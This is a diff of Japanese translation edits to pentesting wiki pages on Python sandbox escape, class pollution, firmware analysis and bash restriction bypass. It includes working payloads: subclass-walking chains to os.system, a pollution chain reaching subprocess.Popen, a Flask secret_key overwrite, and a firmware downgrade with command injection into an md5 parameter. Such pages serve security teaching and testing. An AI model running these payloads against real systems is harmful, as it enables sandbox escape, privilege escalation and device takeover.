+たくさんありますが、**私たちはコマンドを実行するために1つだけ必要です**: ```python [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls") ``` -私たちは、**コマンドを実行する**ために使用できることがわかっている**他のライブラリ**でも同じことができます: +他のライブラリでも同じことができます。これらのライブラリはコマンドを実行するために使用できることがわかっています。 ```python #os [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" in x.__init__.__globals__ ][0]["os"].system("ls") @@ -502,7 +502,7 @@ builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalE pdb: """ ``` -さらに、**他のライブラリ**が**コマンドを実行するための関数を呼び出す**ことができると思う場合、可能なライブラリ内の**関数名でフィルタリング**することもできます: +さらに、**他のライブラリ**が**コマンドを実行するための関数を呼び出す**ことができると思う場合、可能なライブラリ内の**関数名でフィルタリング**することもできます。 ```python bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"] bad_func_names = ["system", "popen", "getstatusoutput", "getoutput", "call", "Popen", "spawn", "import_module", "__import__", "load_source", "execfile", "execute", "__builtins__"] @@ -538,7 +538,7 @@ __builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, Fil ## ビルトイン、グローバルの再帰的検索... > [!WARNING] -> これはただの**素晴らしい**ものです。もしあなたが**globals、builtins、open、または何かのようなオブジェクトを探しているなら**、このスクリプトを使って**そのオブジェクトを見つけることができる場所を再帰的に見つけてください。** +> これはただの**素晴らしい**ものです。もし**globals、builtins、open、またはその他のオブジェクトを探しているなら**、このスクリプトを使って**そのオブジェクトを見つけることができる場所を再帰的に探してください。** ```python import os, sys # Import these to find more gadgets @@ -682,11 +682,11 @@ people = PeopleInfo('GEEKS', 'FORGEEKS') st = "{people_obj.__init__.__globals__[CONFIG][KEY]}" get_name_for_avatar(st, people_obj = people) ``` -通常の方法で **属性** に **ドット** を使ってアクセスできることに注意してください `people_obj.__init__` と **辞書要素** に **括弧** を使って引用符なしで `__globals__[CONFIG]`。 +通常の方法で **属性** に **ドット** を使ってアクセスできることに注意してください `people_obj.__init__` と **辞書要素** に **括弧** を使って引用符なしで `__globals__[CONFIG]` -また、`.__dict__` を使用してオブジェクトの要素を列挙できることにも注意してください `get_name_for_avatar("{people_obj.__init__.__globals__[os].__dict__}", people_obj = people)`。 +また、`.__dict__` を使用してオブジェクトの要素を列挙できることにも注意してください `get_name_for_avatar("{people_obj.__init__.__globals__[os].__dict__}", people_obj = people)` -フォーマット文字列の他の興味深い特徴は、**`str`**、**`repr`**、および **`ascii`** の **関数** を指定されたオブジェクトで実行する可能性であり、それぞれ **`!s`**、**`!r`**、**`!a`** を追加することで実現できます。 +フォーマット文字列の他の興味深い特徴は、**`str`**、**`repr`**、および **`ascii`** の **関数** を指定されたオブジェクトで **実行** する可能性であり、それぞれ **`!s`**、**`!r`**、**`!a`** を追加することによって実現されます: ```python st = "{people_obj.__init__.__globals__[CONFIG][KEY]!a}" get_name_for_avatar(st, people_obj = people) @@ -705,7 +705,7 @@ return 'HAL 9000' **フォーマット** **文字列**の例についての**さらなる例**は[**https://pyformat.info/**](https://pyformat.info)で見つけることができます。 > [!CAUTION] -> Python内部オブジェクトから**機密情報を読み取る**ガジェットについては、次のページも確認してください: +> 次のページも確認して、**Python内部オブジェクトから機密情報を読み取る**ガジェットを探してください: {{#ref}} ../python-internal-read-gadgets.md @@ -739,10 +739,10 @@ As reminder, every time an action is performed in python some function is execut You have more like this in the section [**Python execution without calls**](#python-execution-without-calls). -A python format string vuln doesn't allow to execute function (it's doesn't allow to use parenthesis), so it's not possible to get RCE like `'{0.system("/bin/sh")}'.format(os)`.\ -However, it's possible to use `[]`. Therefore, if a common python library has a **`__getitem__`** or **`__getattr__`** method that executes arbitrary code, it's possible to abuse them to get RCE. +Pythonのフォーマット文字列の脆弱性では関数を実行することはできません(括弧を使用することはできません)、したがって、`'{0.system("/bin/sh")}'.format(os)`のようにRCEを取得することは不可能です。\ +しかし、`[]`を使用することは可能です。したがって、一般的なPythonライブラリに**`__getitem__`**または**`__getattr__`**メソッドがあり、任意のコードを実行する場合、それらを悪用してRCEを取得することが可能です。 -Looking for a gadget like that in python, the writeup purposes this [**Github search query**](https://github.com/search?q=repo%3Apython%2Fcpython+%2Fdef+%28__getitem__%7C__getattr__%29%2F+path%3ALib%2F+-path%3ALib%2Ftest%2F&type=code). Where he found this [one](https://github.com/python/cpython/blob/43303e362e3a7e2d96747d881021a14c7f7e3d0b/Lib/ctypes/__init__.py#L463): +Pythonでそのようなガジェットを探すために、書き込みはこの[**Github search query**](https://github.com/search?q=repo%3Apython%2Fcpython+%2Fdef+%28__getitem__%7C__getattr__%29%2F+path%3ALib%2F+-path%3ALib%2Ftest%2F&type=code)を提案しています。そこで彼はこの[one](https://github.com/python/cpython/blob/43303e362e3a7e2d96747d881021a14c7f7e3d0b/Lib/ctypes/__init__.py#L463)を見つけました。 ```python class LibraryLoader(object): def __init__(self, dlltype): @@ -772,12 +772,12 @@ pydll = LibraryLoader(PyDLL) ## Pythonオブジェクトの解析 -> [!NOTE] +> [!TIP] > **pythonバイトコード**について深く**学びたい**場合は、このトピックに関する**素晴らしい**投稿を読んでください: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d) いくつかのCTFでは、**フラグ**が存在する**カスタム関数の名前**が提供され、その**関数**の**内部**を確認して抽出する必要があります。 -これが検査する関数です: +これは検査する関数です: ```python def get_flag(some_input): var1=1 @@ -810,7 +810,7 @@ CustomClassObject.__class__.__init__.__globals__ ### **関数コードへのアクセス** -**`__code__`** と `func_code`: この **属性** に **アクセス** して、関数の **コードオブジェクト** を **取得** できます。 +**`__code__`** と `func_code`: この **属性** に **アクセス** することで、関数の **コードオブジェクト** を **取得** できます。 ```python # In our current example get_flag.__code__ @@ -898,7 +898,7 @@ dis.dis(get_flag) 44 LOAD_CONST 0 (None) 47 RETURN_VALUE ``` -注意してください、**もしpythonサンドボックスで`dis`をインポートできない場合**、関数の**バイトコード**(`get_flag.func_code.co_code`)を取得し、ローカルで**逆アセンブル**することができます。変数が読み込まれている内容(`LOAD_CONST`)は見ることができませんが、`LOAD_CONST`が読み込まれている変数のオフセットも示すため、(`get_flag.func_code.co_consts`)から推測することができます。 +注意してください、**もしpythonサンドボックスで`dis`をインポートできない場合**、関数の**バイトコード**(`get_flag.func_code.co_code`)を取得し、ローカルで**逆アセンブル**することができます。変数が読み込まれる内容(`LOAD_CONST`)は見ることができませんが、`LOAD_CONST`が読み込まれる変数のオフセットも示すため、(`get_flag.func_code.co_consts`)から推測することができます。 ```python dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S') 0 LOAD_CONST 1 (1) @@ -922,8 +922,8 @@ dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x0 ``` ## Pythonのコンパイル -さて、何らかの方法で**実行できない関数についての情報をダンプできる**と想像してみましょう。しかし、**実行する必要があります**。\ -次の例のように、その関数の**コードオブジェクトにアクセスできる**が、ディスアセンブルを読むだけでは**フラグを計算する方法がわからない**(_より複雑な`calc_flag`関数を想像してください_) +さて、あなたが**実行できない関数についての情報をダンプできる**と仮定しましょうが、**実行する必要があります**。\ +次の例のように、あなたはその関数の**コードオブジェクトにアクセスできます**が、ディスアセンブルを読むだけでは**フラグを計算する方法がわからない**(_より複雑な`calc_flag`関数を想像してください_) ```python def get_flag(some_input): var1=1 @@ -957,7 +957,7 @@ mydict = {} mydict['__builtins__'] = __builtins__ function_type(code_obj, mydict, None, None, None)("secretcode") ``` -> [!NOTE] +> [!TIP] > Pythonのバージョンによって、`code_type`の**パラメータ**は**異なる順序**を持つ場合があります。実行中のPythonバージョンでのパラメータの順序を知る最良の方法は、次のコマンドを実行することです: > > ``` @@ -982,7 +982,7 @@ function_type(code_obj, mydict, None, None, None)("secretcode") ``` ### 防御のバイパス -この投稿の最初の例では、**`compile` 関数を使用して任意の Python コードを実行する方法**を見ることができます。これは、**ループやすべてを含む完全なスクリプトを** **ワンライナー**で実行できるため興味深いです(そして、**`exec`**を使用しても同じことができます)。\ +この投稿の最初の例では、**`compile` 関数を使用して任意の Python コードを実行する方法**を見ることができます。これは、**ループやすべてを含むスクリプト全体を** **ワンライナー**で実行できるため興味深いです(そして、**`exec`**を使用しても同じことができます)。\ とにかく、時には**ローカルマシン**で**コンパイルされたオブジェクト**を**作成**し、**CTFマシン**で実行することが有用な場合があります(例えば、CTFに`compiled`関数がないため)。 例えば、_./poc.py_を読み取る関数を手動でコンパイルして実行してみましょう: @@ -1012,7 +1012,7 @@ mydict['__builtins__'] = __builtins__ codeobj = code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '', 1, '', (), ()) function_type(codeobj, mydict, None, None, None)() ``` -`eval`や`exec`にアクセスできない場合は、**適切な関数**を作成できますが、直接呼び出すと通常は次のエラーが発生します: _restricted modeではコンストラクタにアクセスできません_。したがって、この関数を呼び出すためには、**制限された環境にない関数が必要です。** +`eval`や`exec`にアクセスできない場合は、**適切な関数**を作成できますが、直接呼び出すと通常は次のエラーが発生します: _restricted modeではコンストラクタにアクセスできません_。したがって、この関数を呼び出すためには、**制限された環境にない関数**が必要です。 ```python #Compile a regular print ftype = type(lambda: None) @@ -1026,6 +1026,7 @@ f(42) **このチュートリアルをチェックしてください**: + {{#ref}} ../../basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md {{#endref}} @@ -1034,7 +1035,7 @@ f(42) ### アサート -`-O` パラメータで最適化されたPythonは、アサートステートメントと**debug**の値に基づく条件付きコードを削除します。\ +`-O` パラメータで最適化されたPythonは、アサート文と**debug**の値に基づく条件付きコードを削除します。\ したがって、次のようなチェックが行われます。 ```python def check_permission(super_user): diff --git a/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md b/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md index 8e58b2571..3a071e3ce 100644 --- a/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md +++ b/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md @@ -116,7 +116,7 @@ print(system_admin_emp.execute_command())
-globalsを通じて他のクラスやグローバル変数を汚染する +他のクラスやグローバル変数をglobalsを通じて汚染する ```python def merge(src, dst): # Recursive merge function @@ -148,7 +148,7 @@ print(NotAccessibleClass) #>
-任意のサブプロセス実行 +任意のサブプロセスの実行 ```python import subprocess, json @@ -180,9 +180,9 @@ subprocess.Popen('whoami', shell=True) # Calc.exe will pop up
-オーバーライティング __kwdefaults__ +Overwritting __kwdefaults__ -**`__kwdefaults__`** はすべての関数の特別な属性であり、Pythonの[ドキュメント](https://docs.python.org/3/library/inspect.html)に基づいて、「**キーワード専用**パラメータのデフォルト値のマッピング」です。この属性を汚染することで、関数のキーワード専用パラメータのデフォルト値を制御できます。これらは、\*または\*argsの後に来る関数のパラメータです。 +**`__kwdefaults__`** はすべての関数の特別な属性であり、Pythonの[ドキュメント](https://docs.python.org/3/library/inspect.html)に基づいています。これは「**キーワード専用**パラメータのデフォルト値のマッピング」です。この属性を汚染することで、関数のキーワード専用パラメータのデフォルト値を制御することができます。これらは、\*または\*argsの後に来る関数のパラメータです。 ```python from os import system import json @@ -225,23 +225,23 @@ execute() #> Executing echo Polluted ファイル間でのFlaskシークレットの上書き -したがって、ウェブのメインPythonファイルで定義されたオブジェクトに対してクラス汚染を行うことができる場合、**そのクラスがメインファイルとは異なるファイルで定義されている**必要があります。前のペイロードで\_\_globals\_\_にアクセスするには、オブジェクトのクラスまたはクラスのメソッドにアクセスする必要があるため、**そのファイルのグローバルにアクセスできますが、メインファイルのグローバルにはアクセスできません**。\ -したがって、**メインページでシークレットキーを定義したFlaskアプリのグローバルオブジェクトにアクセスできません**。 +したがって、ウェブのメインPythonファイルで定義されたオブジェクトに対してクラス汚染を行うことができる場合、**そのクラスがメインファイルとは異なるファイルで定義されている**必要があります。前のペイロードで\_\_globals\_\_にアクセスするには、オブジェクトのクラスまたはクラスのメソッドにアクセスする必要があるため、**そのファイルのグローバルにアクセスできますが、メインのものにはアクセスできません**。\ +したがって、**メインページでシークレットキーを定義したFlaskアプリのグローバルオブジェクトにアクセスできなくなります**。 ```python app = Flask(__name__, template_folder='templates') app.secret_key = '(:secret:)' ``` -このシナリオでは、ファイルを横断してメインのファイルに到達し、**グローバルオブジェクト `app.secret_key`** にアクセスしてFlaskのシークレットキーを変更し、このキーを知ることで[**権限を昇格させる**](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign)ためのガジェットが必要です。 +このシナリオでは、ファイルを横断してメインのファイルに到達し、**グローバルオブジェクト `app.secret_key`** にアクセスしてFlaskのシークレットキーを変更し、このキーを知ることで[**権限を昇格させる**](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign)必要があります。 -このようなペイロードは、[この解説から](https://ctftime.org/writeup/36082): +このようなペイロードは、[このレポート](https://ctftime.org/writeup/36082)からのものです: ```python __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.secret_key ``` -このペイロードを使用して**`app.secret_key`**(あなたのアプリでは名前が異なる場合があります)を変更し、新しいより多くの権限を持つフラスククッキーに署名できるようにします。 +このペイロードを使用して **`app.secret_key`** を変更し(アプリ内の名前は異なる場合があります)、新しいより多くの権限を持つフラスククッキーに署名できるようにします。
-さらに、以下のページも参照して読み取り専用のガジェットを確認してください: +次のページも参照して、読み取り専用のガジェットを確認してください: {{#ref}} python-internal-read-gadgets.md diff --git a/src/hardware-physical-access/firmware-analysis/README.md b/src/hardware-physical-access/firmware-analysis/README.md index 4467e038d..6b003efe3 100644 --- a/src/hardware-physical-access/firmware-analysis/README.md +++ b/src/hardware-physical-access/firmware-analysis/README.md @@ -6,19 +6,21 @@ ### 関連リソース + {{#ref}} synology-encrypted-archive-decryption.md {{#endref}} + ファームウェアは、デバイスが正しく動作するために必要なソフトウェアであり、ハードウェアコンポーネントとユーザーが対話するソフトウェア間の通信を管理し促進します。これは永続メモリに保存されており、デバイスが電源を入れた瞬間から重要な指示にアクセスできるようにし、オペレーティングシステムの起動につながります。ファームウェアを調査し、潜在的に修正することは、セキュリティの脆弱性を特定するための重要なステップです。 ## **情報収集** **情報収集**は、デバイスの構成や使用されている技術を理解するための重要な初期ステップです。このプロセスには、以下のデータを収集することが含まれます: -- 実行されているCPUアーキテクチャとオペレーティングシステム +- CPUアーキテクチャと実行されているオペレーティングシステム - ブートローダーの詳細 -- ハードウェアのレイアウトとデータシート +- ハードウェアレイアウトとデータシート - コードベースのメトリクスとソースの場所 - 外部ライブラリとライセンスの種類 - 更新履歴と規制認証 @@ -32,9 +34,9 @@ synology-encrypted-archive-decryption.md ファームウェアを取得する方法はいくつかあり、それぞれ異なる複雑さがあります: - **直接**ソース(開発者、製造業者)から -- 提供された指示から**ビルド**する -- 公式サポートサイトから**ダウンロード**する -- ホストされているファームウェアファイルを見つけるために**Google dork**クエリを利用する +- **提供された指示**から構築する +- **公式サポートサイト**からダウンロードする +- ホストされたファームウェアファイルを見つけるために**Google dork**クエリを利用する - [S3Scanner](https://github.com/sa7mon/S3Scanner)のようなツールを使って**クラウドストレージ**に直接アクセスする - 中間者攻撃技術を介して**更新**を傍受する - **UART**、**JTAG**、または**PICit**のような接続を通じてデバイスから**抽出**する @@ -45,7 +47,7 @@ synology-encrypted-archive-decryption.md ## ファームウェアの分析 -今や**ファームウェアを持っている**ので、それについての情報を抽出してどのように扱うかを知る必要があります。そのために使用できるさまざまなツールがあります: +ファームウェアを**取得した**ので、それに関する情報を抽出してどのように扱うかを知る必要があります。そのために使用できるさまざまなツールがあります: ```bash file strings -n8 @@ -54,7 +56,7 @@ hexdump -C -n 512 > hexdump.out hexdump -C | head # might find signatures in header fdisk -lu #lists a drives partition and filesystems if multiple ``` -もしこれらのツールであまり見つからない場合は、`binwalk -E `を使って画像の**エントロピー**を確認してください。エントロピーが低い場合、暗号化されている可能性は低いです。エントロピーが高い場合、暗号化されている(または何らかの方法で圧縮されている)可能性があります。 +画像の**エントロピー**を`binwalk -E `で確認し、エントロピーが低ければ暗号化されていない可能性が高いです。エントロピーが高ければ、暗号化されている(または何らかの方法で圧縮されている)可能性があります。 さらに、これらのツールを使用して**ファームウェア内に埋め込まれたファイル**を抽出できます: @@ -66,12 +68,12 @@ fdisk -lu #lists a drives partition and filesystems if multiple ### ファイルシステムの取得 -前述のツール(`binwalk -ev `など)を使用して、**ファイルシステムを抽出**できたはずです。\ +前述のツール`binwalk -ev `を使用して**ファイルシステムを抽出**できたはずです。\ Binwalkは通常、**ファイルシステムのタイプに名前を付けたフォルダー**内に抽出します。通常、以下のいずれかです:squashfs、ubifs、romfs、rootfs、jffs2、yaffs2、cramfs、initramfs。 #### 手動ファイルシステム抽出 -場合によっては、binwalkが**ファイルシステムのマジックバイトをシグネチャに持っていない**ことがあります。このような場合は、binwalkを使用して**ファイルシステムのオフセットを見つけ、バイナリから圧縮されたファイルシステムを切り出し、以下の手順に従って**ファイルシステムを手動で抽出します。 +場合によっては、binwalkが**ファイルシステムのマジックバイトをシグネチャに持っていない**ことがあります。このような場合は、binwalkを使用して**ファイルシステムのオフセットを見つけ、バイナリから圧縮されたファイルシステムを切り出し**、以下の手順に従ってそのタイプに応じて**手動でファイルシステムを抽出**します。 ``` $ binwalk DIR850L_REVB.bin @@ -123,7 +125,7 @@ $ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs ### 初期分析ツール -バイナリファイル(``と呼ばれる)の初期検査のためのコマンドセットが提供されています。これらのコマンドは、ファイルタイプの特定、文字列の抽出、バイナリデータの分析、およびパーティションとファイルシステムの詳細を理解するのに役立ちます。 +バイナリファイル(``と呼ばれる)の初期検査のためのコマンドセットが提供されています。これらのコマンドは、ファイルタイプの特定、文字列の抽出、バイナリデータの分析、およびパーティションとファイルシステムの詳細の理解に役立ちます: ```bash file strings -n8 @@ -138,7 +140,7 @@ fdisk -lu #lists partitions and filesystems, if there are multiple ### ファイルシステムの抽出 -`binwalk -ev `を使用することで、通常はファイルシステムを抽出でき、しばしばファイルシステムタイプ(例:squashfs、ubifs)にちなんだ名前のディレクトリに抽出されます。しかし、**binwalk**がマジックバイトの欠如によりファイルシステムタイプを認識できない場合、手動抽出が必要です。これには、`binwalk`を使用してファイルシステムのオフセットを特定し、その後`dd`コマンドを使用してファイルシステムを切り出します: +`binwalk -ev `を使用することで、通常はファイルシステムを抽出でき、しばしばファイルシステムタイプ(例:squashfs、ubifs)にちなんだ名前のディレクトリに抽出されます。しかし、**binwalk**がマジックバイトの欠如によりファイルシステムタイプを認識できない場合、手動抽出が必要です。これには、`binwalk`を使用してファイルシステムのオフセットを特定し、その後`dd`コマンドを使用してファイルシステムを切り出します。 ```bash $ binwalk DIR850L_REVB.bin @@ -148,11 +150,11 @@ $ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs ### ファイルシステム分析 -ファイルシステムが抽出されると、セキュリティの欠陥を探す作業が始まります。注意が払われるのは、安全でないネットワークデーモン、ハードコーディングされた資格情報、APIエンドポイント、更新サーバーの機能、未コンパイルのコード、スタートアップスクリプト、オフライン分析用のコンパイル済みバイナリです。 +ファイルシステムが抽出されると、セキュリティの欠陥を探す作業が始まります。注意が払われるのは、安全でないネットワークデーモン、ハードコーディングされた認証情報、APIエンドポイント、更新サーバーの機能、未コンパイルのコード、スタートアップスクリプト、オフライン分析用のコンパイル済みバイナリです。 -**確認すべき主要な場所**と**項目**には以下が含まれます: +**検査すべき主要な場所**と**項目**には以下が含まれます: -- **etc/shadow** と **etc/passwd** のユーザー資格情報 +- **etc/shadow** と **etc/passwd** のユーザー認証情報 - **etc/ssl** のSSL証明書とキー - 潜在的な脆弱性のための設定ファイルとスクリプトファイル - さらなる分析のための埋め込まれたバイナリ @@ -170,11 +172,11 @@ $ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs ## 動的分析のためのファームウェアのエミュレーション -ファームウェアをエミュレートするプロセスは、デバイスの動作または個々のプログラムの**動的分析**を可能にします。このアプローチは、ハードウェアやアーキテクチャの依存関係に関する課題に直面することがありますが、ルートファイルシステムや特定のバイナリを、Raspberry Piのような一致するアーキテクチャとエンディアンを持つデバイスや、事前構築された仮想マシンに転送することで、さらなるテストを促進できます。 +ファームウェアをエミュレートするプロセスは、デバイスの動作または個々のプログラムの**動的分析**を可能にします。このアプローチは、ハードウェアやアーキテクチャの依存関係に関する課題に直面することがありますが、ルートファイルシステムや特定のバイナリを、Raspberry Piのような一致するアーキテクチャとエンディアンネスを持つデバイスや、事前構築された仮想マシンに転送することで、さらなるテストが容易になります。 ### 個々のバイナリのエミュレーション -単一のプログラムを調査するためには、プログラムのエンディアンとCPUアーキテクチャを特定することが重要です。 +単一のプログラムを調べるためには、プログラムのエンディアンネスとCPUアーキテクチャを特定することが重要です。 #### MIPSアーキテクチャの例 @@ -198,7 +200,7 @@ ARMバイナリの場合、プロセスは似ており、エミュレーショ ## 実践における動的分析 -この段階では、実際のデバイス環境またはエミュレートされた環境が分析に使用されます。OSおよびファイルシステムへのシェルアクセスを維持することが重要です。エミュレーションはハードウェアの相互作用を完全に模倣できない場合があるため、時折エミュレーションの再起動が必要です。分析はファイルシステムを再訪し、公開されたウェブページやネットワークサービスを悪用し、ブートローダーの脆弱性を探るべきです。ファームウェアの整合性テストは、潜在的なバックドア脆弱性を特定するために重要です。 +この段階では、実際のデバイス環境またはエミュレートされたデバイス環境が分析に使用されます。OSおよびファイルシステムへのシェルアクセスを維持することが重要です。エミュレーションはハードウェアの相互作用を完全に模倣できない場合があるため、時折エミュレーションを再起動する必要があります。分析はファイルシステムを再訪し、公開されたウェブページやネットワークサービスを悪用し、ブートローダーの脆弱性を探るべきです。ファームウェアの整合性テストは、潜在的なバックドアの脆弱性を特定するために重要です。 ## 実行時分析技術 @@ -206,11 +208,11 @@ ARMバイナリの場合、プロセスは似ており、エミュレーショ ## バイナリの悪用と概念実証 -特定された脆弱性のPoCを開発するには、ターゲットアーキテクチャの深い理解と低レベル言語でのプログラミングが必要です。組み込みシステムにおけるバイナリ実行時保護は稀ですが、存在する場合は、リターン指向プログラミング(ROP)などの技術が必要になることがあります。 +特定された脆弱性のPoCを開発するには、ターゲットアーキテクチャと低レベル言語でのプログラミングに関する深い理解が必要です。組み込みシステムにおけるバイナリ実行時保護は稀ですが、存在する場合は、リターン指向プログラミング(ROP)などの技術が必要になることがあります。 ## ファームウェア分析のための準備されたオペレーティングシステム -[AttifyOS](https://github.com/adi0x90/attifyos) や [EmbedOS](https://github.com/scriptingxss/EmbedOS) などのオペレーティングシステムは、必要なツールを備えたファームウェアセキュリティテストのための事前構成された環境を提供します。 +[AttifyOS](https://github.com/adi0x90/attifyos) や [EmbedOS](https://github.com/scriptingxss/EmbedOS) のようなオペレーティングシステムは、必要なツールを備えたファームウェアセキュリティテストのための事前構成された環境を提供します。 ## ファームウェアを分析するための準備されたOS @@ -219,17 +221,17 @@ ARMバイナリの場合、プロセスは似ており、エミュレーショ ## ファームウェアダウングレード攻撃と安全でない更新メカニズム -ベンダーがファームウェアイメージの暗号署名チェックを実装しても、**バージョンロールバック(ダウングレード)保護はしばしば省略されます**。ブートローダーまたはリカバリーローダーが埋め込まれた公開鍵で署名を確認するだけで、フラッシュされるイメージの*バージョン*(または単調カウンター)を比較しない場合、攻撃者は**有効な署名を持つ古い脆弱なファームウェアを正当にインストール**でき、修正された脆弱性を再導入することができます。 +ベンダーがファームウェアイメージの暗号署名チェックを実装しても、**バージョンロールバック(ダウングレード)保護はしばしば省略されます**。ブートローダーまたはリカバリーローダーが埋め込まれた公開鍵で署名を検証するだけで、フラッシュされるイメージの*バージョン*(または単調カウンター)を比較しない場合、攻撃者は**有効な署名を持つ古い脆弱なファームウェアを正当にインストール**でき、修正された脆弱性を再導入することができます。 典型的な攻撃ワークフロー: 1. **古い署名済みイメージを取得** - * ベンダーの公開ダウンロードポータル、CDN、またはサポートサイトから取得します。 - * 付属のモバイル/デスクトップアプリケーションから抽出します(例:Android APKの `assets/firmware/` 内)。 - * VirusTotal、インターネットアーカイブ、フォーラムなどのサードパーティリポジトリから取得します。 +* ベンダーの公開ダウンロードポータル、CDN、またはサポートサイトから取得します。 +* 付属のモバイル/デスクトップアプリケーションから抽出します(例:Android APKの `assets/firmware/` 内)。 +* VirusTotal、インターネットアーカイブ、フォーラムなどのサードパーティリポジトリから取得します。 2. **イメージをデバイスにアップロードまたは提供** します: - * Web UI、モバイルアプリAPI、USB、TFTP、MQTTなど。 - * 多くの消費者向けIoTデバイスは、Base64エンコードされたファームウェアブロブを受け入れる*認証されていない*HTTP(S)エンドポイントを公開しており、サーバー側でデコードし、リカバリ/アップグレードをトリガーします。 +* Web UI、モバイルアプリAPI、USB、TFTP、MQTTなど。 +* 多くの消費者向けIoTデバイスは、Base64エンコードされたファームウェアブロブを受け入れる*認証されていない* HTTP(S) エンドポイントを公開し、サーバー側でデコードし、リカバリ/アップグレードをトリガーします。 3. ダウングレード後、最新のリリースで修正された脆弱性を悪用します(例えば、後で追加されたコマンドインジェクションフィルターなど)。 4. オプションで、最新のイメージを再フラッシュするか、持続性を得た後に検出を避けるために更新を無効にします。 @@ -240,11 +242,11 @@ Host: 192.168.0.1 Content-Type: application/octet-stream Content-Length: 0 ``` -脆弱な(ダウングレードされた)ファームウェアでは、`md5`パラメータがサニタイズされることなくシェルコマンドに直接連結されており、任意のコマンドの注入を可能にしています(ここでは、SSHキーによるルートアクセスの有効化)。後のファームウェアバージョンでは基本的な文字フィルタが導入されましたが、ダウングレード保護がないため、修正は無意味です。 +脆弱な(ダウングレードされた)ファームウェアでは、`md5`パラメータがサニタイズされることなくシェルコマンドに直接連結されており、任意のコマンドの注入を可能にしています(ここでは、SSHキーによるルートアクセスの有効化)。後のファームウェアバージョンでは基本的な文字フィルタが導入されましたが、ダウングレード保護が欠如しているため、修正は無意味です。 ### モバイルアプリからのファームウェアの抽出 -多くのベンダーは、アプリがBluetooth/Wi-Fi経由でデバイスを更新できるように、完全なファームウェアイメージをそのコンパニオンモバイルアプリ内にバンドルしています。これらのパッケージは、一般的に`assets/fw/`や`res/raw/`のようなパスの下に暗号化されずに保存されています。`apktool`、`ghidra`、または単純な`unzip`などのツールを使用すると、物理ハードウェアに触れることなく署名されたイメージを抽出できます。 +多くのベンダーは、アプリがBluetooth/Wi-Fi経由でデバイスを更新できるように、完全なファームウェアイメージをそのコンパニオンモバイルアプリケーション内にバンドルしています。これらのパッケージは、一般的に`assets/fw/`や`res/raw/`のようなパスの下に暗号化されずに保存されています。`apktool`、`ghidra`、または単純な`unzip`などのツールを使用すると、物理ハードウェアに触れることなく署名されたイメージを抽出できます。 ``` $ apktool d vendor-app.apk -o vendor-app $ ls vendor-app/assets/firmware @@ -255,7 +257,7 @@ firmware_v1.3.11.490_signed.bin * *アップデートエンドポイント*の輸送/認証は適切に保護されていますか(TLS + 認証)? * デバイスはフラッシングの前に**バージョン番号**または**単調なアンチロールバックカウンター**を比較しますか? * 画像はセキュアブートチェーン内で検証されていますか(例:ROMコードによる署名の確認)? -* ユーザーランドコードは追加の整合性チェックを行いますか(例:許可されたパーティションマップ、モデル番号)? +* ユーザーランドコードは追加のサニティチェックを行いますか(例:許可されたパーティションマップ、モデル番号)? * *部分的*または*バックアップ*のアップデートフローは同じ検証ロジックを再利用していますか? > 💡 上記のいずれかが欠けている場合、プラットフォームはロールバック攻撃に対して脆弱である可能性があります。 diff --git a/src/linux-hardening/bypass-bash-restrictions/README.md b/src/linux-hardening/bypass-bash-restrictions/README.md index 6ccfa10d1..c4f74aaa2 100644 --- a/src/linux-hardening/bypass-bash-restrictions/README.md +++ b/src/linux-hardening/bypass-bash-restrictions/README.md @@ -144,7 +144,7 @@ echo ${PATH:0:1} #/ ### ビルトイン -外部関数を実行できず、**RCEを取得するための限られたビルトインのセット**にしかアクセスできない場合、いくつかの便利なトリックがあります。通常、**すべての**ビルトインを使用することはできないので、**すべてのオプションを知っておく**必要があります。アイデアは[**devploit**](https://twitter.com/devploit)から。\ +外部関数を実行できず、**RCEを取得するための限られたビルトインのセット**にしかアクセスできない場合、いくつかの便利なトリックがあります。通常、**すべての**ビルトインを使用することはできないため、**すべてのオプションを知っておく**必要があります。アイデアは[**devploit**](https://twitter.com/devploit)から。\ まず、すべての[**シェルビルトイン**](https://www.gnu.org/software/bash/manual/html_node/Shell-Builtin-Commands.html)**を確認してください。** それから、いくつかの**推奨事項**があります: ```bash # Get list of builtins @@ -296,13 +296,13 @@ ln /f* ``` ## 読み取り専用/Noexec/Distroless バイパス -**読み取り専用および noexec 保護**があるファイルシステム内や、distroless コンテナ内にいる場合でも、**任意のバイナリを実行する方法、さらにはシェルを実行する方法があります!:** +**読み取り専用および noexec 保護** のあるファイルシステム内、または distroless コンテナ内にいる場合でも、**任意のバイナリを実行する方法があります。シェルさえも!:** {{#ref}} bypass-fs-protections-read-only-no-exec-distroless/ {{#endref}} -## Chroot & その他のジェイル バイパス +## Chroot およびその他のジェイル バイパス {{#ref}} ../privilege-escalation/escaping-from-limited-bash.md @@ -310,7 +310,7 @@ bypass-fs-protections-read-only-no-exec-distroless/ ## スペースベースの Bash NOP スレッド ("Bashsledding") -脆弱性により、最終的に `system()` 